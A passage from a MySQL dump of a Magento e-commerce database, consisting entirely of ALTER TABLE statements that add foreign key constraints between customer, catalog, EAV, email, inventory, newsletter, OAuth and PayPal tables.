  ADD CONSTRAINT `CUSTOMER_ENTITY_VARCHAR_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CUSTOMER_ENTITY_VARCHAR_ENTITY_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_form_attribute`
--
ALTER TABLE `customer_form_attribute`
  ADD CONSTRAINT `CUSTOMER_FORM_ATTRIBUTE_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `design_change`
--
ALTER TABLE `design_change`
  ADD CONSTRAINT `DESIGN_CHANGE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `directory_country_region_name`
--
ALTER TABLE `directory_country_region_name`
  ADD CONSTRAINT `DIR_COUNTRY_REGION_NAME_REGION_ID_DIR_COUNTRY_REGION_REGION_ID` FOREIGN KEY (`region_id`) REFERENCES `directory_country_region` (`region_id`) ON DELETE CASCADE;

--
-- Constraints for table `downloadable_link`
--
ALTER TABLE `downloadable_link`
  ADD CONSTRAINT `DOWNLOADABLE_LINK_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `downloadable_link_price`
--
ALTER TABLE `downloadable_link_price`
  ADD CONSTRAINT `DOWNLOADABLE_LINK_PRICE_LINK_ID_DOWNLOADABLE_LINK_LINK_ID` FOREIGN KEY (`link_id`) REFERENCES `downloadable_link` (`link_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `DOWNLOADABLE_LINK_PRICE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `downloadable_link_purchased`
--
ALTER TABLE `downloadable_link_purchased`
  ADD CONSTRAINT `DL_LNK_PURCHASED_CSTR_ID_CSTR_ENTT_ENTT_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE SET NULL,
  ADD CONSTRAINT `DOWNLOADABLE_LINK_PURCHASED_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE SET NULL;

--
-- Constraints for table `downloadable_link_purchased_item`
--
ALTER TABLE `downloadable_link_purchased_item`
  ADD CONSTRAINT `DL_LNK_PURCHASED_ITEM_ORDER_ITEM_ID_SALES_ORDER_ITEM_ITEM_ID` FOREIGN KEY (`order_item_id`) REFERENCES `sales_order_item` (`item_id`) ON DELETE SET NULL,
  ADD CONSTRAINT `DL_LNK_PURCHASED_ITEM_PURCHASED_ID_DL_LNK_PURCHASED_PURCHASED_ID` FOREIGN KEY (`purchased_id`) REFERENCES `downloadable_link_purchased` (`purchased_id`) ON DELETE CASCADE;

--
-- Constraints for table `downloadable_link_title`
--
ALTER TABLE `downloadable_link_title`
  ADD CONSTRAINT `DOWNLOADABLE_LINK_TITLE_LINK_ID_DOWNLOADABLE_LINK_LINK_ID` FOREIGN KEY (`link_id`) REFERENCES `downloadable_link` (`link_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `DOWNLOADABLE_LINK_TITLE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `downloadable_sample`
--
ALTER TABLE `downloadable_sample`
  ADD CONSTRAINT `DOWNLOADABLE_SAMPLE_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `downloadable_sample_title`
--
ALTER TABLE `downloadable_sample_title`
  ADD CONSTRAINT `DL_SAMPLE_TTL_SAMPLE_ID_DL_SAMPLE_SAMPLE_ID` FOREIGN KEY (`sample_id`) REFERENCES `downloadable_sample` (`sample_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `DOWNLOADABLE_SAMPLE_TITLE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_attribute`
--
ALTER TABLE `eav_attribute`
  ADD CONSTRAINT `EAV_ATTRIBUTE_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_attribute_group`
--
ALTER TABLE `eav_attribute_group`
  ADD CONSTRAINT `EAV_ATTR_GROUP_ATTR_SET_ID_EAV_ATTR_SET_ATTR_SET_ID` FOREIGN KEY (`attribute_set_id`) REFERENCES `eav_attribute_set` (`attribute_set_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_attribute_label`
--
ALTER TABLE `eav_attribute_label`
  ADD CONSTRAINT `EAV_ATTRIBUTE_LABEL_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ATTRIBUTE_LABEL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_attribute_option`
--
ALTER TABLE `eav_attribute_option`
  ADD CONSTRAINT `EAV_ATTRIBUTE_OPTION_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_attribute_option_swatch`
--
ALTER TABLE `eav_attribute_option_swatch`
  ADD CONSTRAINT `EAV_ATTRIBUTE_OPTION_SWATCH_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ATTR_OPT_SWATCH_OPT_ID_EAV_ATTR_OPT_OPT_ID` FOREIGN KEY (`option_id`) REFERENCES `eav_attribute_option` (`option_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_attribute_option_value`
--
ALTER TABLE `eav_attribute_option_value`
  ADD CONSTRAINT `EAV_ATTRIBUTE_OPTION_VALUE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ATTR_OPT_VAL_OPT_ID_EAV_ATTR_OPT_OPT_ID` FOREIGN KEY (`option_id`) REFERENCES `eav_attribute_option` (`option_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_attribute_set`
--
ALTER TABLE `eav_attribute_set`
  ADD CONSTRAINT `EAV_ATTRIBUTE_SET_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity`
--
ALTER TABLE `eav_entity`
  ADD CONSTRAINT `EAV_ENTITY_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity_attribute`
--
ALTER TABLE `eav_entity_attribute`
  ADD CONSTRAINT `EAV_ENTITY_ATTRIBUTE_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTT_ATTR_ATTR_GROUP_ID_EAV_ATTR_GROUP_ATTR_GROUP_ID` FOREIGN KEY (`attribute_group_id`) REFERENCES `eav_attribute_group` (`attribute_group_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity_datetime`
--
ALTER TABLE `eav_entity_datetime`
  ADD CONSTRAINT `EAV_ENTITY_DATETIME_ENTITY_ID_EAV_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `eav_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_DATETIME_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTT_DTIME_ENTT_TYPE_ID_EAV_ENTT_TYPE_ENTT_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity_decimal`
--
ALTER TABLE `eav_entity_decimal`
  ADD CONSTRAINT `EAV_ENTITY_DECIMAL_ENTITY_ID_EAV_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `eav_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_DECIMAL_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_DECIMAL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity_int`
--
ALTER TABLE `eav_entity_int`
  ADD CONSTRAINT `EAV_ENTITY_INT_ENTITY_ID_EAV_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `eav_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_INT_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_INT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity_store`
--
ALTER TABLE `eav_entity_store`
  ADD CONSTRAINT `EAV_ENTITY_STORE_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_STORE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity_text`
--
ALTER TABLE `eav_entity_text`
  ADD CONSTRAINT `EAV_ENTITY_TEXT_ENTITY_ID_EAV_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `eav_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_TEXT_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_TEXT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_entity_varchar`
--
ALTER TABLE `eav_entity_varchar`
  ADD CONSTRAINT `EAV_ENTITY_VARCHAR_ENTITY_ID_EAV_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `eav_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_VARCHAR_ENTITY_TYPE_ID_EAV_ENTITY_TYPE_ENTITY_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_ENTITY_VARCHAR_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_form_element`
--
ALTER TABLE `eav_form_element`
  ADD CONSTRAINT `EAV_FORM_ELEMENT_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_FORM_ELEMENT_FIELDSET_ID_EAV_FORM_FIELDSET_FIELDSET_ID` FOREIGN KEY (`fieldset_id`) REFERENCES `eav_form_fieldset` (`fieldset_id`) ON DELETE SET NULL,
  ADD CONSTRAINT `EAV_FORM_ELEMENT_TYPE_ID_EAV_FORM_TYPE_TYPE_ID` FOREIGN KEY (`type_id`) REFERENCES `eav_form_type` (`type_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_form_fieldset`
--
ALTER TABLE `eav_form_fieldset`
  ADD CONSTRAINT `EAV_FORM_FIELDSET_TYPE_ID_EAV_FORM_TYPE_TYPE_ID` FOREIGN KEY (`type_id`) REFERENCES `eav_form_type` (`type_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_form_fieldset_label`
--
ALTER TABLE `eav_form_fieldset_label`
  ADD CONSTRAINT `EAV_FORM_FIELDSET_LABEL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_FORM_FSET_LBL_FSET_ID_EAV_FORM_FSET_FSET_ID` FOREIGN KEY (`fieldset_id`) REFERENCES `eav_form_fieldset` (`fieldset_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_form_type`
--
ALTER TABLE `eav_form_type`
  ADD CONSTRAINT `EAV_FORM_TYPE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `eav_form_type_entity`
--
ALTER TABLE `eav_form_type_entity`
  ADD CONSTRAINT `EAV_FORM_TYPE_ENTITY_TYPE_ID_EAV_FORM_TYPE_TYPE_ID` FOREIGN KEY (`type_id`) REFERENCES `eav_form_type` (`type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EAV_FORM_TYPE_ENTT_ENTT_TYPE_ID_EAV_ENTT_TYPE_ENTT_TYPE_ID` FOREIGN KEY (`entity_type_id`) REFERENCES `eav_entity_type` (`entity_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `email_campaign`
--
ALTER TABLE `email_campaign`
  ADD CONSTRAINT `EMAIL_CAMPAIGN_STORE_ID_CORE/STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `email_catalog`
--
ALTER TABLE `email_catalog`
  ADD CONSTRAINT `EMAIL_CATALOG_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `email_contact`
--
ALTER TABLE `email_contact`
  ADD CONSTRAINT `EMAIL_CONTACT_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `email_contact_consent`
--
ALTER TABLE `email_contact_consent`
  ADD CONSTRAINT `FK_17E9EA0C469163E550BC6B732AC49FDB` FOREIGN KEY (`email_contact_id`) REFERENCES `email_contact` (`email_contact_id`) ON DELETE CASCADE;

--
-- Constraints for table `email_coupon_attribute`
--
ALTER TABLE `email_coupon_attribute`
  ADD CONSTRAINT `EMAIL_COUPON_ATTRIBUTE_COUPON_ID_SALESRULE_COUPON_COUPON_ID` FOREIGN KEY (`salesrule_coupon_id`) REFERENCES `salesrule_coupon` (`coupon_id`) ON DELETE CASCADE;

--
-- Constraints for table `email_order`
--
ALTER TABLE `email_order`
  ADD CONSTRAINT `EMAIL_ORDER_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EMAIL_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `email_wishlist`
--
ALTER TABLE `email_wishlist`
  ADD CONSTRAINT `EMAIL_WISHLIST_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `EMAIL_WISHLIST_WISHLIST_ID_WISHLIST_WISHLIST_ID` FOREIGN KEY (`wishlist_id`) REFERENCES `wishlist` (`wishlist_id`) ON DELETE CASCADE;

--
-- Constraints for table `googleoptimizer_code`
--
ALTER TABLE `googleoptimizer_code`
  ADD CONSTRAINT `GOOGLEOPTIMIZER_CODE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `integration`
--
ALTER TABLE `integration`
  ADD CONSTRAINT `INTEGRATION_CONSUMER_ID_OAUTH_CONSUMER_ENTITY_ID` FOREIGN KEY (`consumer_id`) REFERENCES `oauth_consumer` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `inventory_source_carrier_link`
--
ALTER TABLE `inventory_source_carrier_link`
  ADD CONSTRAINT `INV_SOURCE_CARRIER_LNK_SOURCE_CODE_INV_SOURCE_SOURCE_CODE` FOREIGN KEY (`source_code`) REFERENCES `inventory_source` (`source_code`) ON DELETE CASCADE;

--
-- Constraints for table `inventory_source_item`
--
ALTER TABLE `inventory_source_item`
  ADD CONSTRAINT `INVENTORY_SOURCE_ITEM_SOURCE_CODE_INVENTORY_SOURCE_SOURCE_CODE` FOREIGN KEY (`source_code`) REFERENCES `inventory_source` (`source_code`) ON DELETE CASCADE;

--
-- Constraints for table `inventory_source_stock_link`
--
ALTER TABLE `inventory_source_stock_link`
  ADD CONSTRAINT `INVENTORY_SOURCE_STOCK_LINK_STOCK_ID_INVENTORY_STOCK_STOCK_ID` FOREIGN KEY (`stock_id`) REFERENCES `inventory_stock` (`stock_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `INV_SOURCE_STOCK_LNK_SOURCE_CODE_INV_SOURCE_SOURCE_CODE` FOREIGN KEY (`source_code`) REFERENCES `inventory_source` (`source_code`) ON DELETE CASCADE;

--
-- Constraints for table `inventory_stock_sales_channel`
--
ALTER TABLE `inventory_stock_sales_channel`
  ADD CONSTRAINT `INVENTORY_STOCK_SALES_CHANNEL_STOCK_ID_INVENTORY_STOCK_STOCK_ID` FOREIGN KEY (`stock_id`) REFERENCES `inventory_stock` (`stock_id`) ON DELETE CASCADE;

--
-- Constraints for table `layout_link`
--
ALTER TABLE `layout_link`
  ADD CONSTRAINT `LAYOUT_LINK_LAYOUT_UPDATE_ID_LAYOUT_UPDATE_LAYOUT_UPDATE_ID` FOREIGN KEY (`layout_update_id`) REFERENCES `layout_update` (`layout_update_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `LAYOUT_LINK_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `LAYOUT_LINK_THEME_ID_THEME_THEME_ID` FOREIGN KEY (`theme_id`) REFERENCES `theme` (`theme_id`) ON DELETE CASCADE;

--
-- Constraints for table `magento_acknowledged_bulk`
--
ALTER TABLE `magento_acknowledged_bulk`
  ADD CONSTRAINT `MAGENTO_ACKNOWLEDGED_BULK_BULK_UUID_MAGENTO_BULK_UUID` FOREIGN KEY (`bulk_uuid`) REFERENCES `magento_bulk` (`uuid`) ON DELETE CASCADE;

--
-- Constraints for table `magento_operation`
--
ALTER TABLE `magento_operation`
  ADD CONSTRAINT `MAGENTO_OPERATION_BULK_UUID_MAGENTO_BULK_UUID` FOREIGN KEY (`bulk_uuid`) REFERENCES `magento_bulk` (`uuid`) ON DELETE CASCADE;

--
-- Constraints for table `mageplaza_bannerslider_banner_slider`
--
ALTER TABLE `mageplaza_bannerslider_banner_slider`
  ADD CONSTRAINT `FK_824689F307EEDC9AF4DD5A7D11110615` FOREIGN KEY (`banner_id`) REFERENCES `mageplaza_bannerslider_banner` (`banner_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_988AB80B5D2DF60CAD31BAFF020B3903` FOREIGN KEY (`slider_id`) REFERENCES `mageplaza_bannerslider_slider` (`slider_id`) ON DELETE CASCADE;

--
-- Constraints for table `media_gallery_asset_keyword`
--
ALTER TABLE `media_gallery_asset_keyword`
  ADD CONSTRAINT `MEDIA_GALLERY_ASSET_KEYWORD_ASSET_ID_MEDIA_GALLERY_ASSET_ID` FOREIGN KEY (`asset_id`) REFERENCES `media_gallery_asset` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `MEDIA_GALLERY_ASSET_KEYWORD_KEYWORD_ID_MEDIA_GALLERY_KEYWORD_ID` FOREIGN KEY (`keyword_id`) REFERENCES `media_gallery_keyword` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `msp_tfa_trusted`
--
ALTER TABLE `msp_tfa_trusted`
  ADD CONSTRAINT `MSP_TFA_TRUSTED_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE;

--
-- Constraints for table `msp_tfa_user_config`
--
ALTER TABLE `msp_tfa_user_config`
  ADD CONSTRAINT `MSP_TFA_USER_CONFIG_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE;

--
-- Constraints for table `newsletter_problem`
--
ALTER TABLE `newsletter_problem`
  ADD CONSTRAINT `NEWSLETTER_PROBLEM_QUEUE_ID_NEWSLETTER_QUEUE_QUEUE_ID` FOREIGN KEY (`queue_id`) REFERENCES `newsletter_queue` (`queue_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `NLTTR_PROBLEM_SUBSCRIBER_ID_NLTTR_SUBSCRIBER_SUBSCRIBER_ID` FOREIGN KEY (`subscriber_id`) REFERENCES `newsletter_subscriber` (`subscriber_id`) ON DELETE CASCADE;

--
-- Constraints for table `newsletter_queue`
--
ALTER TABLE `newsletter_queue`
  ADD CONSTRAINT `NEWSLETTER_QUEUE_TEMPLATE_ID_NEWSLETTER_TEMPLATE_TEMPLATE_ID` FOREIGN KEY (`template_id`) REFERENCES `newsletter_template` (`template_id`) ON DELETE CASCADE;

--
-- Constraints for table `newsletter_queue_link`
--
ALTER TABLE `newsletter_queue_link`
  ADD CONSTRAINT `NEWSLETTER_QUEUE_LINK_QUEUE_ID_NEWSLETTER_QUEUE_QUEUE_ID` FOREIGN KEY (`queue_id`) REFERENCES `newsletter_queue` (`queue_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `NLTTR_QUEUE_LNK_SUBSCRIBER_ID_NLTTR_SUBSCRIBER_SUBSCRIBER_ID` FOREIGN KEY (`subscriber_id`) REFERENCES `newsletter_subscriber` (`subscriber_id`) ON DELETE CASCADE;

--
-- Constraints for table `newsletter_queue_store_link`
--
ALTER TABLE `newsletter_queue_store_link`
  ADD CONSTRAINT `NEWSLETTER_QUEUE_STORE_LINK_QUEUE_ID_NEWSLETTER_QUEUE_QUEUE_ID` FOREIGN KEY (`queue_id`) REFERENCES `newsletter_queue` (`queue_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `NEWSLETTER_QUEUE_STORE_LINK_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `newsletter_subscriber`
--
ALTER TABLE `newsletter_subscriber`
  ADD CONSTRAINT `NEWSLETTER_SUBSCRIBER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `oauth_nonce`
--
ALTER TABLE `oauth_nonce`
  ADD CONSTRAINT `OAUTH_NONCE_CONSUMER_ID_OAUTH_CONSUMER_ENTITY_ID` FOREIGN KEY (`consumer_id`) REFERENCES `oauth_consumer` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `oauth_token`
--
ALTER TABLE `oauth_token`
  ADD CONSTRAINT `OAUTH_TOKEN_ADMIN_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`admin_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `OAUTH_TOKEN_CONSUMER_ID_OAUTH_CONSUMER_ENTITY_ID` FOREIGN KEY (`consumer_id`) REFERENCES `oauth_consumer` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `OAUTH_TOKEN_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `paypal_billing_agreement`
--
ALTER TABLE `paypal_billing_agreement`
  ADD CONSTRAINT `PAYPAL_BILLING_AGREEMENT_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PAYPAL_BILLING_AGREEMENT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `paypal_billing_agreement_order`
--
ALTER TABLE `paypal_billing_agreement_order`
  ADD CONSTRAINT `PAYPAL_BILLING_AGREEMENT_ORDER_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PAYPAL_BILLING_AGRT_ORDER_AGRT_ID_PAYPAL_BILLING_AGRT_AGRT_ID` FOREIGN KEY (`agreement_id`) REFERENCES `paypal_billing_agreement` (`agreement_id`) ON DELETE CASCADE;

--
-- Constraints for table `paypal_cert`
--
ALTER TABLE `paypal_cert`
  ADD CONSTRAINT `PAYPAL_CERT_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `paypal_settlement_report_row`
--
ALTER TABLE `paypal_settlement_report_row`
  ADD CONSTRAINT `FK_E183E488F593E0DE10C6EBFFEBAC9B55` FOREIGN KEY (`report_id`) REFERENCES `paypal_settlement_report` (`report_id`) ON DELETE CASCADE;

--
-- Constraints for table `persistent_session`
--
ALTER TABLE `persistent_session`
  ADD CONSTRAINT `PERSISTENT_SESSION_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PERSISTENT_SESSION_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `product_alert_price`
--
ALTER TABLE `product_alert_price`
  ADD CONSTRAINT `PRODUCT_ALERT_PRICE_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PRODUCT_ALERT_PRICE_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PRODUCT_ALERT_PRICE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PRODUCT_ALERT_PRICE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `product_alert_stock`
--
ALTER TABLE `product_alert_stock`
  ADD CONSTRAINT `PRODUCT_ALERT_STOCK_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PRODUCT_ALERT_STOCK_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PRODUCT_ALERT_STOCK_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `PRODUCT_ALERT_STOCK_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
